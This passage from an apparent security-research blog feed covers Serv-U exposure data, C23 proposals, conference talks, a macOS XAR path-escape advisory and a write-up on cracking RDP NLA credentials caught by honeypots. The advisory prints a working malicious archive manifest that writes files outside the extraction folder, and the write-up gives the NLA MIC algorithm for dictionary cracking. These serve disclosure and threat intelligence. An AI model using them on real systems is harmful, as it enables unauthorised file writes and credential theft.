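    for lineno, line in enumerate(text.splitlines(), start=1):
        if EXCEPTION_MARKER in line:
            hits.append((lineno, line.strip()))
    return hits
```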

Vulnerability Landscape

Many vulnerable, internet-accessible Serv-U servers are currently still online around the world.

In July 2021, after Microsoft published details of the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers remained significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount Country
1141 China
549 United States
99 Canada
92 Russia
88 Hong Kong
81 Germany
65 Austria
61 France
57 Italy
50 Taiwan
36 Sweden
31 Spain
30 Vietnam
29 Netherlands
28 South Korea
27 United Kingdom
26 India
21 Ukraine
18 Brazil
17 Denmark

Top vulnerable versions identified:

Amount Version
441 SSH-2.0-Serv-U_15.1.6.25
236 SSH-2.0-Serv-U_15.0.0.0
222 SSH-2.0-Serv-U_15.0.1.20
179 SSH-2.0-Serv-U_15.1.5.10
175 SSH-2.0-Serv-U_14.0.1.0
143 SSH-2.0-Serv-U_15.1.3.3
138 SSH-2.0-Serv-U_15.1.7.162
102 SSH-2.0-Serv-U_15.1.1.108
88 SSH-2.0-Serv-U_15.1.0.480
85 SSH-2.0-Serv-U_15.1.2.189

MITRE ATT&CK mapping

  • Initial Access – T1190 (Exploit Public-Facing Application): TA505 exploited CVE-2021-35211 to gain remote code execution.
  • Execution – T1059.001 (Command and Scripting Interpreter: PowerShell): TA505 used Base64-encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems.
  • Persistence – T1053.005 (Scheduled Task/Job: Scheduled Task): TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence.
  • Defense Evasion – T1112 (Modify Registry): TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64-encoded strings in the registry.

References

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211
[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211
[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

✇ NCC Group Research

Public Report – Zcash NU5 Cryptography Review

By: Jennifer Fernick

In March 2021, Electric Coin Co. engaged NCC Group to perform a review of the upcoming network protocol upgrade NU5 to the Zcash protocol (codenamed “Orchard”). The review was to be performed over multiple phases: first, the specification document changes and the relevant ZIPs, then, in June 2021, the implementation itself. 

The Public Report for this review may be downloaded below:

✇ NCC Group Research

The Next C Language Standard (C23)

By: Robert C. Seacord


The cutoff for new feature proposals for the next C Language Standard (C23) has come and gone, meaning that we know some of the things that will be in the next standard and all of the things that will not be. There are still a bunch of papers that have been submitted but not yet adopted into C23. Some of these papers will be accepted, some will be rejected, and potentially some good ideas won’t make it because of lack of time to perfect them and gain consensus. NCC Group has already had a number of proposals accepted into C23. This blog post reviews an additional five papers that we have submitted which are currently under consideration.


Clarifying integer terms v2

During a committee discussion of the behavior of calloc, it became clear that the committee lacks a consensus definition of terms such as “overflow” and “wraparound” that are commonly used to discuss integer arithmetic. As a result, the committee can’t answer the simple question “do unsigned numbers overflow?”.

This paper [N2837] is unlikely to change the behavior of the language. However, having taught Secure Coding in C and C++ for 16 years, I can tell you it is extremely important that we have a common shared vocabulary to discuss language behaviors; especially behaviors like overflow and wraparound that commonly result in exploitable vulnerabilities.
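
As a concrete illustration of the terminology at stake (our example, not the paper’s): unsigned arithmetic in C is defined to wrap around modulo 2^N, whereas signed integer overflow is undefined behavior. Simulating 32-bit unsigned addition:

```python
# Unsigned arithmetic in C is reduced modulo 2**N ("wraparound") and is
# well-defined; signed integer overflow, by contrast, is undefined behavior.
def uadd32(a: int, b: int) -> int:
    """Simulate 32-bit unsigned addition as C defines it."""
    return (a + b) % 2**32

# UINT32_MAX + 1 wraps to 0: defined behavior, though often still a bug
assert uadd32(0xFFFFFFFF, 1) == 0
```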

Identifier Syntax using Unicode Standard Annex 31

Unicode® Standard Annex #31 Unicode Identifier and Pattern Syntax [Davis 2009] describes specifications for recommended defaults for the use of Unicode in the definitions of identifiers and in pattern-based syntax, and has been adopted by C++, Rust, Python, and other languages. By adopting the recommendations of UAX #31, C will be easier to work with in international environments and less prone to accidental problems. This paper [N2836] also aligns the C language with other current languages that defer to Unicode UAX #31 for identifier syntax.

calloc Wraparound Handling

RUS-CERT [RUS-CERT 2002, Weimer 2002] documented the defect in calloc implementations and similar routines:

Integer overflow can occur during the computation of the memory region size by calloc and similar functions. As a result, the function returns a buffer which is too small, possibly resulting in a subsequent buffer overflow.

While most implementations were repaired, the standard was not updated to clarify the existing requirement.

The problem subsequently reoccurred [MSRC 2021]. The same vulnerability exists in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. This paper [N2810] clarifies the existing behavior of calloc in the event that nmemb * size wraps around, to help prevent future implementation defects resulting in security vulnerabilities.
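
The clarified requirement boils down to a pre-multiplication check, sketched here in Python (illustrative only; a real calloc performs this test in C before computing nmemb * size):

```python
SIZE_MAX = 2**64 - 1  # assuming a 64-bit size_t

def calloc_size_ok(nmemb: int, size: int) -> bool:
    """True if nmemb * size fits in size_t. A conforming calloc must fail
    the allocation (return NULL) when this check fails, rather than
    allocating the wrapped-around, too-small size."""
    if nmemb == 0 or size == 0:
        return True
    # nmemb * size <= SIZE_MAX, rearranged to avoid the overflowing multiply
    return nmemb <= SIZE_MAX // size
```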

Annex K Repairs

Annex K Bounds-checking interfaces provides alternative library functions that promote safer, more secure programming. Annex K’s *_s functions verify that output buffers are large enough for the intended result and return a failure indicator if they are not. Annex K’s set_constraint_handler_s function is specified to set the global process-wide runtime-constraint handler and return a pointer to the previously registered process-wide handler. However, because the process-wide handler is shared among all threads in a program, it is not well-suited for multithreaded programs where code runs in separate threads. This paper [N2809] proposes two alternative solutions for using constraint handlers in multithreaded programs.

Volatile C++ Compatibility

The volatile keyword imposes restrictions on access and caching and is often necessary for memory that can be externally modified. Some uses of the volatile keyword are ambiguous, incorrect, or insecure. Consequently, C++ has deprecated many of these uses [P1152R4]. This paper [N2743] proposes deprecating these same uses of the volatile keyword in C for the same reasons, and to maintain compatibility with C++.

References

[Davis 2009] Mark Davis. Unicode Standard Annex #31 Unicode Identifier and Pattern Syntax. September, 2009. URL: http://www.unicode.org/reports/tr31/tr31-11.html

[MSRC 2021] MSRC Team. “BadAlloc” – Memory allocation vulnerabilities could affect wide range of IoT and OT devices in industrial, medical, and enterprise networks. April 29, 2021. URL: https://msrc-blog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-wide-range-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/

[N2743] Robert C. Seacord. Volatile C++ Compatibility. May, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2743.pdf

[N2809] Robert C. Seacord. Annex K Repairs. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2809.pdf

[N2810] Robert C. Seacord. calloc wraparound handling. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2810.pdf

[N2836] Robert C. Seacord. Identifier Syntax using Unicode Standard Annex 31. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2836.pdf

[N2837] Robert C. Seacord. Clarifying integer terms v2. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2837.pdf

[P1152R4] JF Bastien. Deprecating volatile. 19 July 2019. URL: http://wg21.link/P1152R4

[RUS-CERT 2002] RUS-CERT Advisory. Flaw in calloc and similar routines 2002-08:02. URL:
https://web.archive.org/web/20081225201357/http://cert.uni-stuttgart.de/advisories/calloc.php

[Weimer 2002] Florian Weimer. RUS-CERT Advisory 2002-08:02: Flaw in calloc and similar routines. August, 2002. URL: https://www.opennet.ru/base/cert/1028651886_905.txt.html


✇ NCC Group Research

Conference Talks – November 2021

By: Aaron Haymore

This month, members of NCC Group will be presenting their work at the following conferences:

  • Jennifer Fernick & David Wheeler (Linux Foundation), “Keynote: Securing Open Source Software”, to be presented at The Linux Foundation Member Summit (November 2-4 2021)
  • Brian Hong, “Sleight of ARM: Demystifying Intel Houdini”, to be presented at Ekoparty (November 2-6 2021)
  • Sanne Maasakkers, “Phish like an APT: Phenomenal pretexting for persuasive phishing”, to be presented at Ekoparty (November 2-6 2021)
  • Frans van Dorsselaer, “Symposium on Post-Quantum Cryptography: Act now, not later”, to be presented at the CWI Symposium on Post-Quantum Cryptography (November 3 2021)
  • Pepijn Hack & Zong-Yu Wu, “We Wait, Because We Know You – Inside the Ransomware Negotiation Economics”, to be presented at Black Hat Europe 2021 (November 8-11 2021)
  • Philip Marsden, “The 5G threat landscape”, to be presented at Control Systems Cybersecurity Europe 2021 (November 9-10 2021)
  • Pepijn Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia), “Dark Reading panel: Ransomware as the New Normal”, to be presented at Black Hat Europe (Business Hall) (November 10 2021)
  • Alex Plaskett, “Pwning the Windows 10 Kernel with NTFS and WNF”, to be presented at Power of Community 2021 (November 11-12 2021) 
  • Tennisha Martin, “Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future”, to be presented at SANS Pentest HackFest (November 15-16 2021)
  • Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (Nov 30 2021)

Please join us!


Keynote: Securing Open Source Software
Jennifer Fernick (NCC Group) & David Wheeler (Linux Foundation)
The Linux Foundation Member Summit
November 2-4 2021


Sleight of ARM: Demystifying Intel Houdini
Brian Hong

Ekoparty
November 2-6 2021

In recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.

In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Phish like an APT: Phenomenal pretexting for persuasive phishing
Sanne Maasakkers 

Ekoparty
November 2-6 2021


Symposium on Post-Quantum Cryptography: Act now, not later
Frans van Dorsselaer 

CWI Symposium on Post-Quantum Cryptography
November 3 2021

The Symposium on Post-Quantum Cryptography is part of a series organized by the CWI Cryptology Group and TNO. The first symposium in April 2021 was a general introduction to the problem from the perspective of industry, government, and end user. In this second episode we zoom in on a number of specific topics, including quantum-safe PKI, the relation between PQC and QKD, and PQC standards & implementation. The symposium is aimed at higher management and security professionals from government, private sector, and industry.

Cryptography is at the heart of internet security. However, much of the currently deployed cryptography is vulnerable to quantum attacks, which will become effective once large-scale quantum computers become feasible. Therefore, the affected cryptographic standards must be replaced by ones that offer security against quantum attacks. The post-quantum cryptography transition may take organizations ten years to complete, or longer. To remain secure and comply with legal and regulatory requirements, affected organizations should act now. What do you need to know – and what can you do – in order to continue your course of business securely?

“We Wait, Because We Know You” – Inside the Ransomware Negotiation Economics
Pepijn Hack & Zong-Yu Wu

Black Hat Europe 2021
November 8-11 2021

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is therefore now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. Little research has however focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods.

This session explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analyzed using both quantitative and qualitative methods.

Analysis of the final ransom agreement reveals that adversaries already know how much victims will pay, even before the negotiations have started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We however provide multiple strategies which can be used by victims to obtain a more favorable outcome. These strategies are taken from negotiation failures and successes derived from the cases we have analyzed and are accompanied by examples and quotes from actual conversations.

When ransomware hits a company, they find themselves in the middle of an unknown situation. One thing that makes those more manageable is to have as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

The 5G threat landscape
Philip Marsden

Control Systems Cybersecurity Europe 2021
November 9-10 2021

While the move to 5G mobile deployments presents a wealth of opportunities and capabilities for us all, the technology also introduces new vulnerabilities and threats. There are three main threat vectors across the various 5G domains, and within these are sub-threats that describe additional points of vulnerability for threat actors to exploit. While not all-inclusive, these types of threats have the potential to increase risk to a particular mobile operator as it transitions to 5G. Policy and standards, securing the supply chain, and the 5G systems architecture itself all have various vulnerabilities associated with them, and are the foundation for securing the future 5G infrastructure. Attackers could chain these threats to further leverage access to your 5G network and compromise hosts or endpoint user devices, be it an IoT device, a handset or a connected vehicle. This overview will attempt to show these threats and specific issues that might pose a risk to IoT/control-system devices, and highlight how to mitigate them.

Dark Reading panel: Ransomware as the New Normal
Pepijn Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia)

Black Hat Europe (Business Hall) 
November 10 2021

It’s the same story, different victim, over and over: a hospital, school system, or business (think Colonial Pipeline) gets hit with a ransomware attack that locks down their servers, their operations, and in the case of healthcare organizations, places their patients at physical risk. Even with increased awareness, known best practices, and now, with governments like the US putting the squeeze on attackers and their cryptocurrency cover, there’s still no real end in sight to ransomware.

A panel of security experts will discuss and debate why ransomware attacks are so easy to pull off, why they’re so hard to stop – and what organizations need to do to double down on their defenses against one of these debilitating cyberattacks. 

Pwning the Windows 10 Kernel with NTFS and WNF
Alex Plaskett

Power of Community 2021
November 11-12 2021

A local privilege escalation 0-day vulnerability (CVE-2021-31956) was identified by Kaspersky as being exploited in the wild. At the time it affected a broad range of Windows versions (right up to the latest and greatest Windows 10).
With no access to the exploit, or details of how it worked other than a vulnerability summary, the following plan was enacted:

  1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
  2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
  3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
  4. Gain insight from this exploit which could be used to enable detection and response by defenders.

The talk covers the above key areas and provides a detailed walkthrough, moving from introducing the subject all the way up to the knowledge needed for both offense and defense on modern Windows versions.

Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future
Tennisha Martin

SANS Pentest HackFest
November 15-16 2021

Mentoring is often used to foster talent within an organization, pairing a junior employee with a more senior high performer. The mentee learns to mirror the behaviors of the mentor, which can be key to advancement. However, it can also lead to a subconscious bias, where employees end up hiring people just like them. This results in organizations that are homogeneous in their thoughts, viewpoints, backgrounds, ideas, perspectives, and approaches to problem solving. In a pen testing context, this leads to similar approaches to vulnerability discovery, testing, and results analysis. Pen testing is all about repeatable processes, and when you don’t change, you don’t learn anything or find anything new. Pen testers need a new approach to mentorship, one that recognizes the impact of a diversified workforce on business outcomes such as increasing innovation, diversifying skill sets, increasing motivation and engagement, and, critically, retaining high-potential talent. The Hacker’s Guide to Mentorship provides an outline of how to improve your bottom line by fixing your talent problem.


Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick

FS-ISAC
November 30 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:  

  • Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more 
  • Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
  • Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption 
  • How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time 
  • Deciding when to begin integrating PQC in a world of competing technology standards 
  • Designing extensible cryptographic architectures
  • Actions financial institutions’ cryptography teams can take immediately 
  • How to talk about this risk with your corporate board

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies. 

✇ NCC Group Research

Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)

By: Rich Warren
Vendor: Apple
Vendor URL: https://www.apple.com/
Versions affected: xar 1.8-dev
Systems Affected: macOS versions below 12.0.1
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URL: https://support.apple.com/en-gb/HT212869
CVE Identifier: CVE-2021-30833
Risk: 5.0 Medium CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

XAR is a file archive format used in macOS, and underlies various file formats, including .xar, .pkg, .safariextz, and .xip files. XAR archives are extracted using the xar command-line utility. XAR was initially developed as an open-source project; however, the original project appears to be no longer maintained. Apple maintains its own branch of XAR for macOS, which is published on the Apple Open Source website. The xar utility suffers from a logical vulnerability which allows files to be extracted outside of the intended destination folder, resulting in arbitrary file write anywhere on the filesystem (permissions allowing).

Impact

An attacker could construct a maliciously crafted .xar file, which when extracted by a user, would result in files being written to a location of the attacker’s choosing. This could be abused to gain Remote Code Execution.

Details

The XAR archive format supports archiving and extraction of symlinks for both files and directories. When extracting an archive which contains both a directory symlink and a file within a directory named the same as the directory symlink, xar will overwrite the directory symlink with a real directory. This protects against maliciously crafted archives where a symlink directory is unarchived and a file is unarchived into it. An example of the Table of Contents (ToC) for a .xar file in this scenario is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
 <toc>
  <checksum style="sha1">
   <offset>0</offset>
   <size>20</size>
  </checksum>
  <file id="1">
   <link type="directory">/tmp/</link>
   <type>symlink</type>
   <name>xx</name>
  </file>
  <file id="2">
   <type>directory</type>
   <name>x</name>
   <file id="3">
    <data>
     <length>6</length>
     <encoding style="application/octet-stream"/>
     <offset>20</offset>
     <size>6</size>
     <extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
     <archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
    </data>
    <type>file</type>
    <name>foo</name>
   </file>
  </file>
 </toc>
</xar>

As shown below, this results in the directory “x” being created in the current directory, and the file foo being written within it, rather than to the /tmp/ directory – which was the target of the directory symlink:

However, xar allows for a forward-slash separated path to be specified in the file name property, e.g. <name>x/foo</name> – as long as it doesn’t traverse upwards, and the path exists within the current directory. This means an attacker can create a .xar file which contains both a directory symlink, and a file with a name property which points into the extracted symlink directory. By abusing symlink directories in this manner, an attacker can write arbitrary files to any directory on the filesystem – providing the user has permissions to write to it. An example of the ToC for a malicious .xar file which exploits this vulnerability is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<xar>
 <toc>
  <checksum style="sha1">
   <offset>0</offset>
   <size>20</size>
  </checksum>
  <file id="1">
   <link type="directory">/tmp/</link>
   <type>symlink</type>
   <name>.x</name>
  </file>
  <file id="2">
    <data>
     <length>6</length>
     <encoding style="application/octet-stream"/>
     <offset>20</offset>
     <size>6</size>
      <extracted-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</extracted-checksum>
      <archived-checksum style="sha1">aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d</archived-checksum>
    </data>
    <type>file</type>
    <name>.x/test</name>
   </file>
 </toc>
</xar>

The following screenshot shows successful exploitation of this vulnerability to write a file into the /tmp/ directory using a directory symlink:
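
The root cause is that the extractor trusts a relative name such as .x/test without re-checking where the path leads once symlinked parent directories are resolved. The kind of check an extractor needs can be sketched as follows (a hypothetical illustration, not Apple’s actual patch):

```python
import os

def safe_member_path(dest_root: str, member_name: str) -> str:
    """Resolve an archive member name against the extraction root and
    refuse it if, after following symlinks in any parent component, the
    final path lands outside the root. A name like ".x/test", where ".x"
    is a symlink to /tmp, resolves outside the root and is rejected."""
    resolved = os.path.realpath(os.path.join(dest_root, member_name))
    root = os.path.realpath(dest_root)
    if os.path.commonpath([resolved, root]) != root:
        raise ValueError(f"member escapes extraction root: {member_name}")
    return resolved
```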

Recommendation

Update to macOS 12.0.1 or above.

Vendor Communication

2021-06-04 – Reported to Apple Product Security.
2021-06-08 - Apple advise they are investigating the report and require more than 30 days.
2021-06-24 - Apple confirm they are able to reproduce the vulnerability and are working to address in a future major macOS update.
2021-08-17 - We request an estimated date for a fix from Apple.
2021-08-19 - Apple advise they are still working on addressing the issue. Request that we hold off any disclosure.
2021-10-25 - macOS 12.0.1 released, which addresses the reported vulnerability.
2021-10-28 - Advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published Date: 2021-10-28

Written By: Richard Warren

✇ NCC Group Research

Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment

By: Jennifer Fernick

During the summer of 2021, WhatsApp engaged NCC Group’s Cryptography Services team to conduct an independent security assessment of its End-to-End Encrypted Backups project. End-to-End Encrypted Backups is a hardware security module (HSM)-based key vault solution that primarily aims to support encrypted backup of WhatsApp user data. This assessment was performed remotely, as a 35 person-day effort by three NCC Group consultants over the course of five weeks. NCC Group and the WhatsApp team scheduled retesting of findings and preparation of this public report for a few weeks after delivery of the initial security assessment.

The Public Report for this review may be downloaded below:

✇ NCC Group Research

Cracking RDP NLA Supplied Credentials for Threat Intelligence

By: Ray Lai

NLA Honeypot Part Deux

This is a continuation of the research from Building an RDP Credential Catcher for Threat Intelligence. In the previous post, we described how to build an RDP credential catcher for threat intelligence, with the caveat that we had to disable NLA in order to receive the password in cleartext. However, RDP clients may be attempting to connect with NLA enabled, which is a stronger form of authentication that does not send passwords in cleartext. In this post, we discuss our work in cracking the hashed passwords being sent over NLA connections to ascertain those supplied by threat actors.

This next phase of research was undertaken by Ray Lai and Ollie Whitehouse.

What is NLA?

NLA, or Network Level Authentication, is an authentication method where a user is authenticated via a hash of their credentials over RDP. Rather than passing the credentials in cleartext, a number of computations are performed on a user’s credentials prior to being sent to the server. The server then performs the same computations on its (possibly hashed) copy of the user’s credentials; if they match, the user is authenticated.

By capturing NLA sessions, which include the hash of a user’s credentials, we can then perform these same computations using a dictionary of passwords, crack the hash, and observe which credentials are being sprayed at RDP servers.

The plan

  1. Capture a legitimate NLA connection.
  2. Parse and extract the key fields from the packets.
  3. Replicate the computations that a server performs on the extracted fields during authentication.

In order to replicate the server’s authentication functionality, we needed an existing server that we could look into. To do this, we modified FreeRDP, an open-source RDP client and server implementation that supports NLA connections.

Our first modification was to add extra debug statements throughout the code in order to trace which functions were called during authentication. Looking at this list of called functions, we determined six functions that either parsed incoming messages or generated outgoing messages.

There are six messages that are sent (“In” or “Out” is from the perspective of the server, so “Negotiate In” is a message sent from the client to the server):

  1. Negotiate In
  2. Negotiate Out
  3. Challenge In
  4. Challenge Out
  5. Authenticate In
  6. Authenticate Out

Once identified, we patched these functions to write the packets to a file. We named the files XXXXX.NegotiateIn, XXXXX.ChallengeOut, etc., with XXXXX being a random integer that was specific to that session, so that we could keep track of which packets were for which session.

Parsing the packets

With the messages stored in files, we began work to parse these messages. For a proof of concept, we wrote a parser for these six messages in Python in order to have a high-level understanding of what was needed in order to crack the hashes contained within the messages. We parsed out each field into its own object, taking hints from FreeRDP code.

Dumping intermediary calculations

When it came time to figure out what type of calculation was being performed by each function (or each step of a function), we also added code to individual functions to dump the raw bytes given as inputs and outputs, in order to ensure the calculations were correctly replicated in the Python code.

Finally, authentication

The ultimate step in NLA authentication is when the server receives the “Authenticate In” message from the client. At that point, it takes all the previous messages, performs some calculation on them, and compares the result with the “MIC” stored in the “Authenticate In” message.

MIC stands for Message Integrity Check, and is roughly the following:

# User, Domain, Password are UTF-16 little-endian
NtHash = MD4(Password)
NtlmV2Hash = HMAC_MD5(NtHash, User + Domain)
ntlm_v2_temp_chal = ChallengeOut->ServerChallenge
                  + "\x01\x01\x00\x00\x00\x00\x00\x00"
                  + ChallengeIn->Timestamp
                  + AuthenticateIn->ClientChallenge
                  + "\x00\x00\x00\x00"
                  + ChallengeIn->TargetInfo
NtProofString = HMAC_MD5(NtlmV2Hash, ntlm_v2_temp_chal)
KeyExchangeKey = HMAC_MD5(NtlmV2Hash, NtProofString)
if EncryptedRandomSessionKey:
    ExportedSessionKey = RC4(KeyExchangeKey, EncryptedRandomSessionKey)
else:
    ExportedSessionKey = KeyExchangeKey
msg = NegotiateIn + ChallengeIn + AuthenticateOut
MIC = HMAC_MD5(ExportedSessionKey, msg)

In the above algorithm, all values are supplied within the six NLA messages (User, Domain, Timestamp, ClientChallenge, ServerChallenge, TargetInfo, EncryptedRandomSessionKey, NegotiateIn, ChallengeIn, and AuthenticateOut), except for one: Password.

But now that we have the algorithm to calculate the MIC, we can perform this same calculation on a list of passwords. Once the MIC matches, we have cracked the password used for the NLA connection!
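The algorithm above translates almost line-for-line into Python. Below is a minimal sketch: the NT hash is taken as an input (MD4 availability in `hashlib` varies by OpenSSL build), the no-`EncryptedRandomSessionKey` case is shown, and `crack` is a hypothetical helper name, not code from the project.

```python
import hmac
import hashlib

def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def compute_mic(nt_hash: bytes, user: str, domain: str,
                server_challenge: bytes, timestamp: bytes,
                client_challenge: bytes, target_info: bytes,
                messages: bytes) -> bytes:
    # NtlmV2Hash = HMAC_MD5(NtHash, User + Domain), UTF-16 little-endian
    ntlm_v2_hash = hmac_md5(nt_hash, (user + domain).encode("utf-16-le"))
    temp = (server_challenge
            + b"\x01\x01\x00\x00\x00\x00\x00\x00"
            + timestamp
            + client_challenge
            + b"\x00\x00\x00\x00"
            + target_info)
    nt_proof_string = hmac_md5(ntlm_v2_hash, temp)
    key_exchange_key = hmac_md5(ntlm_v2_hash, nt_proof_string)
    # With no EncryptedRandomSessionKey, the key exchange key is used directly.
    exported_session_key = key_exchange_key
    # messages = NegotiateIn + ChallengeIn + AuthenticateOut
    return hmac_md5(exported_session_key, messages)

def crack(candidate_nt_hashes, observed_mic, **fields):
    """Try candidate NT hashes until one reproduces the captured MIC."""
    for nt_hash in candidate_nt_hashes:
        if hmac.compare_digest(compute_mic(nt_hash, **fields), observed_mic):
            return nt_hash
    return None
```

In practice the candidate NT hashes come from running MD4 over each UTF-16LE password in the dictionary; everything else is read out of the six captured messages.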

At this point we are ready to start setting up RDP credential catchers, dumping the NLA messages, and cracking them with a list of passwords.

Code

All the code we developed as part of this project has been open sourced here – https://github.com/nccgroup/nlahoney – along with all our supporting research notes and code.

Future

The next logical step would be to rewrite the Python password cracker into a hashcat module, left as an exercise to the reader.


Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet

By: Michael Gough

Category:  Detection/Reduction/Prevention

Overview

Remote Desktop Protocol (RDP) is how users of Microsoft Windows systems get a remote desktop to manage one or more workstations and/or servers. With the increase of organizations opting for remote work, so too has RDP usage over the internet increased. However, RDP was not initially designed with the security and privacy features needed to use it safely over the internet. RDP communicates over the widely known port 3389, making it very easy for criminal threat actors to discover. Furthermore, the default authentication method is limited to only a username and password.

The dangers of RDP exposure, and of similar solutions such as TeamViewer (port 5938) and VNC (port 5900), are demonstrated in a recent report published by cybersecurity researchers at Coveware. The researchers found that 42 percent of ransomware cases in Q2 2021 leveraged RDP Compromise as an attack vector. They also found that “In Q2 email phishing and brute forcing exposed remote desktop protocol (RDP) remained the cheapest and thus most profitable and popular methods for threat actors to gain initial foot holds inside of corporate networks.”

RDP has also had its fair share of critical vulnerabilities targeted by threat actors. For example, the BlueKeep vulnerability (CVE-2019-0708) first reported in May 2019 was present in all unpatched versions of Microsoft Windows 2000 through Windows Server 2008 R2 and Windows 7. Subsequently, September 2019 saw the release of a public wormable exploit for the RDP vulnerability.

The following details are provided to assist organizations in detecting, threat hunting, and reducing malicious RDP attempts.

The Challenge for Organizations

The limitations of authentication mechanisms for RDP significantly increases the risk to organizations with instances of exposed RDP to the internet. By default, RDP does not have a built-in multi-factor authentication (MFA). To add MFA to RDP logins, organizations will have to implement a Remote Desktop Gateway or place the RDP server behind a VPN that supports MFA. However, these additional controls add cost and complexity that some organizations may not be able to support.

The risk of exposed RDP is further highlighted through user propensity for password reuse. Employees using the same password for RDP as they do for other websites means if a website gets breached, threat actors will likely add that password to a list for use with brute force attempts.

Organizations with poor password policies are bound to the same pitfalls as password reuse for RDP.  Shorter and easily remembered passwords give threat actors an increased chance of success in the brute force of exposed RDP instances.

Another challenge is that organizations do not often monitor RDP logins, allowing successful RDP compromises to go undetected. In the event that RDP logins are collected, organizations should work to make sure that, at the very least, timestamps, IP addresses, and the country or city of the login are ingested into a log management solution.

Detection

Detecting the use of RDP is something that is captured in several logs within a Microsoft Windows environment. Unfortunately, most organizations do not have a log management or SIEM solution to collect the logs that could alert to misuse, furthering the challenge to organizations to secure RDP. 

RDP Access in the logs

